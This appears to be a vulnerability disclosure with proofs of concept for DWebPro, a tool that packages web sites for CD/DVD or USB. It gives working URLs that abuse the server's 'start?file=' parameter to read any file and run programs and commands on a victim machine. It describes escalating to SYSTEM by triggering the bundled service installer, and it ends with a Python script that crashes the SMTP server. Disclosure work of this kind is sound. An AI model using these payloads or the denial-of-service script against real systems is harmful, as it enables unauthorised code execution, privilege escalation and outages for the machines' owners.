# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It
includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the
installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain
contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited
remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks.
2. Remote Binary Execution and Local File Inclusion Proof of Concept
When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the
local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english
\dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It
is important to note however that when browsing to an executable file through this vulnerability, that the web server
will indeed run the application locally instead of prompting you for a download. As an example, the following will start the
calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe".
Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially.
Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig".
These privileges can be escalated to SYSTEM however by installing the application as a windows service which will
automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script
which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using
"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat".
3. Denial of Service Proof of Concept
#!/usr/bin/python
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.1',25))
evil = 'A' * 300
s.recv(1024)
s.send(evil)
s.close()